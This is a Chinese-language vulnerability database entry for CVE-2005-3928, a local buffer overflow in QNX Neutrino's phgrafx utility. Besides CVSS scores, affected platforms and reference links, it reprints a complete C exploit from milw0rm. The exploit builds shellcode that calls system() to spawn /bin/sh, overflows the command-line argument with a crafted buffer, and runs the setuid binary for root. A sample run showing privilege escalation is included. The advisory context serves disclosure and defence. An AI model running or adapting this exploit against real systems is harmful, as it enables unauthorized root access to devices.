CVE-2005-3928
CVSS4.6
发布时间 :2005-11-30 06:03:00
修订时间 :2011-03-07 21:27:23
NMCOE    

[原文]Buffer overflow in phgrafx in QNX 6.2.1 and 6.3.0 allows local users to execute arbitrary code via a long command line argument.


[CNNVD]QNX Neutrino本地权限提升漏洞(CNNVD-200511-489)

        QNX Neutrino是嵌入式设备的微内核实时操作系统。
        QNX Neutrino的"phgrafx"工具中存在缓冲区溢出漏洞,恶意用户可以利用这个漏洞在本地获得权限提升。
        例如:
        qnx$ uname -a; id
        QNX qnx 6.3.0 2004/04/29-21:23:19UTC x86pc x86
        uid=6(deadbeef) gid=1(bin) groups=0(root),3(sys),4(adm),5(tty)
        qnx$ gcc phex.c -o phex -W
        qnx$ ./phex
        shellcode length: 21
        address: 0x8047a2c
        Warning: can not find palette under '55

- CVSS (基础分值)

CVSS分值: 4.6 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:qnx:rtos:6.3.0
cpe:/a:qnx:rtos:6.2.1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3928
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3928
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200511-489
(官方数据源) CNNVD

- 其它链接及资源

http://www.vupen.com/english/advisories/2005/2669
(UNKNOWN)  VUPEN  ADV-2005-2669
http://www.securityfocus.com/bid/16539
(UNKNOWN)  BID  16539
http://www.securityfocus.com/bid/15619
(UNKNOWN)  BID  15619
http://www.securityfocus.com/archive/1/archive/1/418105/100/0/threaded
(UNKNOWN)  BUGTRAQ  20051129 possible privilege escalation on QNX Neutrino 6.3.0
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=384
(UNKNOWN)  IDEFENSE  20060207 QNX Neutrino RTOS phgrafx Command Buffer Overflow
http://securitytracker.com/id?1015599
(UNKNOWN)  SECTRACK  1015599
http://secunia.com/advisories/17781
(UNKNOWN)  SECUNIA  17781

- 漏洞信息

QNX Neutrino本地权限提升漏洞
中危 缓冲区溢出
2005-11-30 00:00:00 2006-06-12 00:00:00
本地  
        QNX Neutrino是嵌入式设备的微内核实时操作系统。
        QNX Neutrino的"phgrafx"工具中存在缓冲区溢出漏洞,恶意用户可以利用这个漏洞在本地获得权限提升。
        例如:
        qnx$ uname -a; id
        QNX qnx 6.3.0 2004/04/29-21:23:19UTC x86pc x86
        uid=6(deadbeef) gid=1(bin) groups=0(root),3(sys),4(adm),5(tty)
        qnx$ gcc phex.c -o phex -W
        qnx$ ./phex
        shellcode length: 21
        address: 0x8047a2c
        Warning: can not find palette under '55

- 公告与补丁

        暂无数据

- 漏洞信息 (1347)

QNX RTOS 6.3.0 (phgrafx) Local Buffer Overflow Exploit (x86) (EDBID:1347)
QNX local
2005-11-30 Verified
0 p. minervini
N/A [点击下载]
/*
 * minervini@neuralnoise.com (c) 2005, all rights reserved.
 * sample exploit for phgrafx on QNX 6.3.0 x86
 *
 * tested on: QNX qnx 6.3.0 2004/04/29-21:23:19UTC x86pc x86
 */

#include <sys/types.h>
#include <stdio.h>
#include <stdlib.h>
#include <dlfcn.h>
#include <unistd.h>
#include <err.h>

#ifndef _PATH
# define _PATH ("/usr/photon/bin/phgrafx")
#endif

#ifndef _RET_INIT
# define _RET_INIT (864)
#endif

/* thanks to my friend pi3 that suggested me to call a libc
 * function to make the shellcode way shorter than it was */

char scode[] = "\x31\xc0"      // xor    %eax,%eax
 "\x50"                        // push   %eax
 "\x68\x2f\x2f\x73\x68"        // push   $0x68732f2f
 "\x68\x2f\x62\x69\x6e"        // push   $0x6e69622f
 "\x54"                        // push   %esp
 "\xbb\xEF\xBE\xAD\xDE"        // mov    $0xDEADBEEF,%ebx
 "\xff\xd3";                   // call   *%ebx

unsigned long get_sp (void) {
  __asm__ ("movl %esp, %eax");
}

int main (int argc, char **argv) {

  int i, slen = strlen (scode), offset = 0;
  long ptr, *lptr, addr;
  char *buf;
  void *handle;

  handle = dlopen (NULL, RTLD_LAZY);
  addr = (long) dlsym (handle, "system");

  for (i = 0; i < 4; i++) {
     char temp = (*((char *) &addr + i) & 0xff);
     if (temp == 0x00 || temp == 0x09 || temp == 0x0a) {
        puts
          ("currently system()'s address contains bytes like 0x00, 0x09 or 0x0a, so it probably won't work since"
           " the application seems to truncate those bytes. BTW you can rely on functions like exec*(), spawn*()"
           " or MsgSend*() to get this working.\n"
           "more at http://www.qnx.org/developers/docs/momentics621_docs/neutrino/lib_ref/");
        return (-1);
     }
  }

  memcpy((char *)&scode + 0xf, &addr, 4);

  if (argc > 1)
    offset = strtoul(argv[1], NULL, 0);

  if (!(buf = (char *) malloc(1032)))
    err(1, "malloc()");

  memset(buf, 0, 1032);

  for (i = 0; i < (_RET_INIT - slen); i++)
    buf[i] = 'A'; // inc %ecx

  printf("shellcode length: %d\n", slen);

  for (i = (_RET_INIT - slen); i < _RET_INIT; i++)
    buf[i] = scode[i - (_RET_INIT - slen)];

  lptr = (long *) (buf + _RET_INIT);

  printf("address: 0x%lx\n", ptr = (get_sp () - offset));

  for (i = 0; i < ((1024 - _RET_INIT) / 4); i++)
    *(lptr + i) = (int) ptr;

  execl(_PATH, "phgrafx", buf, NULL);

  return (0);
}

// milw0rm.com [2005-11-30]
		

- 漏洞信息

21266
QNX RTOS phgrafx Local Overflow
Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2005-11-28 Unknow
2005-11-28 Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站